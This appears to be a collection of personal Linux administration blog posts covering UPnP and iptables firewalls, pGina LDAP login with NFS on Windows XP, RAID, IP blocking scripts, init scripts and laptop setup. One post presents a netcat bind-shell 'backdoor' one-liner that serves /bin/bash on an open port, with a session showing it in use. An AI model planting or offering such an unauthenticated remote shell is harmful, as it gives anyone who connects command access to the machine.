Universal Plug and Play (uPnP) in Debian

Before I begin, uPnP does have some security implications. Users that can send uPnP requests can open any port to any other computer. Please read the comments below for more details.

If you are currently using a Linux router on a home network, you should consider uPnP. uPnP allows computers to request ports be opened for them, so applications that require open ports can work without work of the owner of the Linux router.

apt-get install libupnp0 linux-igd

Edit /etc/default/upnpd and specify your external and internal interfacecs; upnp does not support multiple interfaces but I suspect multiple instances of this program could accomplish this; just replace the /etc/init.d/upnpd file with a custom one like this

#!/bin/bash

case $1 in

start)

upnpd eth0 eth1

upnpd eth0 eth2

;;

stop)

killall upnpd

;;

esac

Restart the daemon, and you should see clients requesting ports in /var/log/syslog (grep for upnp).

If you do not, make sure that you see the following line in “route”

239.0.0.0       *               255.0.0.0       U     0      0        0 eth3

Where eth3 is your internal interface. If not, add it with

route add -net 239.0.0.0 netmask 255.0.0.0 eth3

Also, if you are blocking any ports with your firewall configuration, you may have to do the following to allow your clients request to reach the server.

iptables -A INPUT -s 192.168.1.0/24 -p tcp --dport 2869 -j ACCEPT
iptables -A INPUT -s 192.168.1.0/24 -p udp --dport 1900 -j ACCEPT

Where 192.168.1.0/24 is your internal network.

A good way to test to make sure this is working is using the Azureus bittorrent client’s NAT checking tool.

Below is a two network firewall script that I am currently using with uPnP; I can’t make any guarantees to how secure it is but it works quite well.


IP2="76.249.179.145"
IP3="76.249.179.147"
/sbin/ip addr add dev eth0 $IP2
/sbin/ip addr add dev eth0 $IP3
/sbin/depmod -a
/sbin/modprobe ip_tables
/sbin/modprobe ip_conntrack
/sbin/modprobe ip_conntrack_ftp
/sbin/modprobe ip_conntrack_irc
/sbin/modprobe iptable_nat
/sbin/modprobe ip_nat_ftp
/sbin/modprobe ip_nat_irc
IPT="/sbin/iptables"
INT0="eth0"
INT2="eth2"
INT3="eth3"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo "65535" > /proc/sys/net/ipv4/ip_conntrack_max
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
echo "1" > /proc/sys/net/ipv4/conf/all/accept_redirects
echo "0" > /proc/sys/net/ipv4/conf/all/log_martians
echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 9000 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 1 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_sack
echo 3000 > /proc/sys/net/ipv4/tcp_max_syn_backlog
$IPT -F
$IPT -X
$IPT -Z
$IPT -P INPUT DROP
$IPT -P FORWARD ACCEPT
$IPT -P OUTPUT ACCEPT
$IPT -N DROPLOG
$IPT -A DROPLOG -j ULOG -m limit --limit 2/hour --ulog-nlgroup 1 --ulog-qthreshold 20
$IPT -A DROPLOG -j REJECT
$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A INPUT -i lo -j ACCEPT
$IPT -A INPUT -i $INT2 -j ACCEPT
$IPT -A INPUT -i $INT3 -j ACCEPT
$IPT -A FORWARD -i $INT3 -o $INT0 -j ACCEPT
$IPT -A FORWARD -i $INT0 -o $INT3 -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INT2 -o $INT0 -j ACCEPT
$IPT -A FORWARD -i $INT0 -o $INT2 -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j SNAT --to-source $IP2
$IPT -t nat -A POSTROUTING -s 192.168.2.0/24 -o eth0 -j SNAT --to-source $IP3
$IPT -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
$IPT -t nat -A POSTROUTING -s 192.168.2.0/24 -o eth0 -j MASQUERADE
$IPT -t nat -A POSTROUTING -s 192.168.2.48 -d 192.168.0.0/16 -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.0.0/16 -d 192.168.2.48 -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.1.1 -d 192.168.1.240 -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.1.240 -d 192.168.1.1 -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.2.48 -d 192.168.1.0/16 -j ACCEPT
$IPT -A INPUT -p tcp --dport 22 -j ACCEPT
$IPT -A INPUT -p tcp --dport 80 -j ACCEPT
#Allow uPnP from internal clients
$IPT -A INPUT -s 192.168.1.0/24 -p tcp --dport 2869 -j ACCEPT
$IPT -A INPUT -s 192.168.1.0/24 -p udp --dport 1900 -j ACCEPT
$IPT -A INPUT -s 192.168.2.0/24 -p tcp --dport 2869 -j ACCEPT
$IPT -A INPUT -s 192.168.2.0/24 -p udp --dport 1900 -j ACCEPT
$IPT -A INPUT -i eth2 -j ACCEPT
$IPT -A INPUT -i eth3 -j ACCEPT
$IPT -A INPUT -s 192.168.20.0/24 -j ACCEPT
$IPT -A INPUT -p tcp -s 192.168.1.0/24 --dport 3128 -j ACCEPT
$IPT -A INPUT -p tcp -s 192.168.2.0/24 --dport 3128 -j ACCEPT
$IPT -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -t nat -A PREROUTING -i eth2 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -t nat -A PREROUTING -i eth3 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -t nat -A PREROUTING -i eth4 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -t nat -A PREROUTING -i eth5 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -A INPUT -i eth0 -p tcp --syn --destination-port 3128 -j DROPLOG
$IPT -A INPUT -j DROPLOG

OpenLDAP Client and NFS on Windows XP

I am assuming your LDAP server is set up as per my previous post.

Before we go further, I would suggest setting up NFS and then updating your /etc/ldap/slapd.conf file

Since Windows (for me) had issues importing my openssl generated cert, I had to allow unencrypted. Depending on your setup, you may not find this to be a suitable option. You must then get a CA cert that isn’t self-signed.

Otherwise, just add ‘by auth’ to your existing access block.


access to attrs=userPassword,shadowLastChange
by tls_ssf=128 ssf=128 dn="cn=admin,dc=uwptechforce,dc=com" write
by tls_ssf=128 ssf=128 anonymous auth
by tls_ssf=128 ssf=128 self write
by auth
by * none

/etc/init.d/slapd restart

Go to http://pgina.org/ and download pGina and Plugins. Install pGina and extract the Plugins archive into c:pGina

You will have to install ldapauth; the installer for x86 and x86_64 is located in C:pGinapluginsLDAP

Unfortunately, from here on out we have to use a graphical configuration utility. Execute C:pGinaconfigure.bat

In the ‘Plugin’ tab, Select this file for the ‘Plugin Path’

C:pGinapluginsldapauthldapauth_plus.dll

You may also want to check the Show authentication method checkbox on this tab; it allows you to select between LDAP and the Local machine in the login window.

Under the Account Interaction tab, check:

Keep Profiles: This will allow you to have persistent files/settings, allow you to make persistent permission changes (remote desktop, file permissions, etc.).

Force Login: If you change your password elsewhere, this will allow you to use the local password with the password you’re authenticated with

Under the Profile tab, you might want to consider changing the default groups for users who log in (separated with semi-colons). By default everyone is a ‘Limited’ user; Power Users might be more appropriate for a Windows workstation. Do not set any options for ‘Profiles’; they do not work and will conflict with LDAP.

We will now configure LDAP using the Plugin Tester; it provides a good way to debug issues and allows you to configure/test in an easy manner. Execute C:pGinaplugin_tester.exe

Browse and select C:pGinapluginsldapauthldapauth_plus.dll. Now let’s configure it.

Click on the ‘Search’ button. Next to LDAP Server enter the hostname/ip of your LDAP server. Set the port to 389. Add “ou=People,dc=server,dc=com” in Contexts.

If you would like to restrict what users can log into pGina, you can set this in the User Configuration tab. I would recommend against changing anything else here until you have a working setup.

Now for the test. Push the pGina Load button. Enter a user/pass and push ‘Login’.

If this does not work, do the usual and debug slapd and look in the Event Viewer in Windows.

Now for NFS.

On any linux LDAP client, you will need to getent passwd > map.txt && getent group > map2.txt to generate a passwd-like file for Windows. No passwords are stored here. I suggest doing this on the NFS server in cron.


0 1 * * 1 getent passwd > /nfs/map.txt
0 1 * * 1 getent group > /nfs/map2.txt

Once a week your passwd and group map will be updated; coincidentally Windows NFS client updates it’s mapping once a week by default. Feel free to change this to happen more often if needed.

Still, you need to copy over map.txt and map2.txt from Linux before NFS works.

Google Windows Services for UNIX Version 3.5. Extract it and run the installer; select ONLY the Client for NFS under NFS and User Name Mappings under Authentication tools for NFS. When prompted, choose ‘passwd-like files’ instead of NIS.

When prompted, browse for your map.txt and map2.txt files.

Create a file called C:nfs.bat


mount 192.168.1.1home Z:

You probably want to run this at startup; just add a new “String Value” in HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun with a name like “mount nfs” and a value of C:nfs.bat

This entry can be easily disabled later with msconfig.

Now run nfs.bat, and check to see that a Z: was created. If so, you’re done!

Remote backdoor on Linux using ‘nc’

nc -l -e /bin/bash -p 10001

Not much to explain here. -l listens for incoming connections, -e executes /bin/bash when you connect, and -p chooses the port to listen on.

You must use a semicolon after each command.

will@hydra:~$ telnet localhost 10001
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
whoami;
will

There you go. Obviously this has the potential for misuse; running this as root will create a remote backdoor after all. But it’s also a very useful administrative tool. Keep in mind that nc is not encrypted in any way, and anyone could use this to connect.

nc terminates after you exit your connection, and only one person can be connected at once.

Raid on Debian Etch

If you’d like to do some RAID 0/1 in Debian Etch with some SATA drives you can do this in only a few simple steps.

cfdisk all your drives; create your partition(s) and make the type linux-raid-autodetect (Type: FD).

mknod /dev/md0 b 9 0

mdadm –create /dev/md0 –level 0 –raid-devices=2 /dev/sda1 /dev/sdb1

You can do level 1 the same way. Keep in mind that if you do multiple md devices, change the last number to the number of the device (mknod /dev/md1 b 9 1, for example).

For RAID 5, do

mdadm –create /dev/md0 –level 5 –raid-devices=3 /dev/sda1 /dev/sdb1 /dev/sdb1

Just keep in mind that RAID 5 needs three or more drives to work.

If you’d like to add more drives to a RAID 5, you can do so easily.

mdadm –add /dev/md0 /dev/sdd1
mdadm –grow /dev/md0 –raid-devices=4

After doing this, you need to resize your filesystem on md0

apt-get install lvm2 lvm-common

pvresize /dev/md0

pvdisplay

You should now be using the full size of the array.

Now all you have to do is

mkfs.ext3 /dev/md0

st0rage.org Security Announcement

Hi All!

I recently received this email from someone ([email protected] actually ;)). I was behind on my email, wish I had seen this sooner.

See http://it.slashdot.org/it/08/02/10/2011257.shtml
You did a good job at hardening your server but you forget /dev/shm
I used http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c to patch
your kernel on-the-fly.
But update your kernel.

A friend.

I’d like to thank the person who contacted me about it, and thank them for fixing the problem. That is probably the coolest thing ever to happen on st0rage. 🙂

Just figured I’d let everyone know; first root exploit since 2004. Whooo! 😀

SunFire V480 and Linux

I’ve been working on a SunFire V480 system with Solaris 8 on it for some time now trying to upgrade it (and hopefully migrate it to debian).

After setting up a test machine, migrating all the applications as well as ldap, I disovered that Sun has not yet opened up the hardware enough to allow developers to have this machine work on any Linux or BSD system.

Looks like I’ll be using OpenSolaris on this machine, and never buying Sun again. 🙂

Vostro 1400 Issues Fixed in Ubuntu Hardy 8.04

I installed Alpha 5 of Ubuntu Hardy 8.04 and have had VERY possitive results.

Fixed issues are:

Fan

After some time my laptop’s fan would turn on and off (from i8k’s 1 setting to 2) whether i8k was loaded or not (i8k would not load without force=1). It did this constantly and was very loud.

This behavior started after many kernel upgrades of 7.10. 8.04 Alpha 4 also had this problem.

The issue seems resolved; my fan stays at setting 1 (fan on low speed). I have not heard it go to setting 2 (high speed) yet, but my laptop does not usually run hotter than 40oC.

Update: i8k does not allow you to turn the fan to the second setting; the hardware seems to control when the fan is turned on high. I notice that the fan seems to respond more to the GPU’s temperature than the CPUs temperature. CPU is usually less than 40oC however, so I’m not concerned.

Sound

This was a major issue with Ubuntu. 7.10 required an option in /etc/modprobe.d/alsa-base (model=3stack). 8.04 did not work at all (I filed a bug report in launchpad that solved this issue).

https://bugs.launchpad.net/ubuntu/+source/linux/+bug/186940

This latest Alpha fixed the issue.

nvidia/Compiz

I have a  GeForce 8400M GS. 7.10 had issues with my card (some kernels could not handle ‘nvidia’ and I had to settle for ‘nv’). Compiz had very strange bugs too (windows could glitch up, lots of twitching when maximizing windows).

8.04 has resolved these issues (for now). Compiz is working beautifully for the first time, and ‘nvidia’ is loaded without issue.

LCD Lid stays on when closed

I noticed recently that the LCD stays on after I close the lid of my laptop. This is a waste of power, and causes the laptop to run hotter than it should.

Edit /etc/acpi/lid.sh and add the following line after /usr/share/acpi-support/screenblank

xset dpms force off

Banning ips with Denyhosts and iptables

If you’re looking for a nice way to automatically ban an ip address without specifically doing the iptables command, here’s a nice script to get you started. This script parses the /etc/hosts.deny file and blocks them using iptables.


#!/bin/bash

ROOT_UID=0


E_NOTROOT=67


if [ "$UID" != "$ROOT_UID" ]; then


echo "Must be root to run this script."


exit $E_NOTROOT


fi


iptables -F


echo "The following ips are blocked: " 1> /var/log/block.log


for x in `cat /etc/hosts.deny | grep -v ^# | cut -d ":" -f 2`; do


/usr/share/.scripts/deny.sh $x >> /var/log/block.log


done


exit0;

For ease of use, that script calls another script called deny.sh.


#!/bin/bash


ROOT_UID=0


E_NOTROOT=67

if [ "$UID" != "$ROOT_UID" ]; then

echo "Must be root to run this script."

exit $E_NOTROOT

fi

iptables -I INPUT -s $1 -j DROP

if [ $? != 0 ]; then

echo "block did not work on $1"

exit 1;

fi

echo "$1 was blocked."

exit 0;

Notice that the script first flushes all the current blocked ip addresses so that you don’t accidentally block the ip addresses many times. This could cause many problems if you’re trying to unblock someone.
Have fun and be safe!

Startup Scripts in Debian

If you would like to add a custom startup script to your Linux machine (for running ircd or an iptables script for example) the process is simple.

Create a file in /etc/init.d

touch /etc/init.d/program

chmod +x /etc/init.d/program

Edit it, and create something like this

#!/bin/bash

case $1 in

start)

sudo -u irc /home/ircd/unreal start

;;

stop)

sudo -u irc /home/ircd/unreal stop

;;

esac

These scripts are run as root, so you should probably use sudo to run programs as unprivileged users.

Now we just have to add it to our default runlevel (runlevel can be found in /etc/inittab on Debian, in Ubuntu this file does not exist as far as I know). The runlevel should be the same across all Debian (including ubuntu) systems.

ln -s /etc/init.d/program /etc/rc2.d/S20program

The S20 requires a little bit of explanation. S means Start, and 20 means to run after the 19’s but before the 21+’s. It’s simply a priority system.  You can replace S with K to ‘stop’ instead of ‘start’ when the computer shuts down.

Secure Portable Workstation with Debian Etch

Pictures coming soon!

I came across a “dying” Dell Latitude C680. It was old, but after looking at the specs I decided to keep it.

2.4/1.2ghz (speedstep)

1GB Ram

60GB HDD (mine was dead)

Two battery/expansion bays (one battery, one floppy)

One CD-Rom drive (thought it was dead, turned out to be the bay itself was bad)

GeForce 440 64mb video

The cdrom drive failed on me, but I was able to replace the floppy drive with another CD-rom drive.

I modified the hard drive bay caddy (mostly with electrical tape and the plastic case of a CF card) to house a 4GB CompactFlash card connected to a CF to IDE laptop convertor. With a little bit of fuss, I was able to get it to slide into the bay without catching on anything.

Using a Debian Etch CD, I did a full disk encryption LVM base install. It wasn’t too slow, however there were parts where the CF card was obviously choking a bit.

After booting into the system, I tested the CF card with hdparm -tT /dev/hda and was pleasantly surprised.

Timing cached reads: 716 MB in 2.00 seconds = 357.50 MB/sec
Timing buffered disk reads: 114 MB in 3.02 seconds = 37.71 MB/sec

So cached reads are about 1/2 as slow as I’d expect from a regular IDE drive, but the buffered disk reads are about as high.
I’m running Fluxbox, with Iceweasel and a few other operations and am noticing no problems with performance. Sometimes when dealing with multiple files at the same time things get slow.

Like any solid-state drive, this will make your laptop much more rugged (no moving parts except for fans and cd-rom drive).

While it has limited space, I could have easily purchased a 8/16/32GB CF card with similar speeds… if I had the money.

The CF card was around $25, and the adapter was $5.

For the next stage, I plan on using the now dead CD rom bay on the side to house USB devices with a powered USB hub.

This laptop will mainly be used for school (if it gets stolen, not a big deal) and war driving.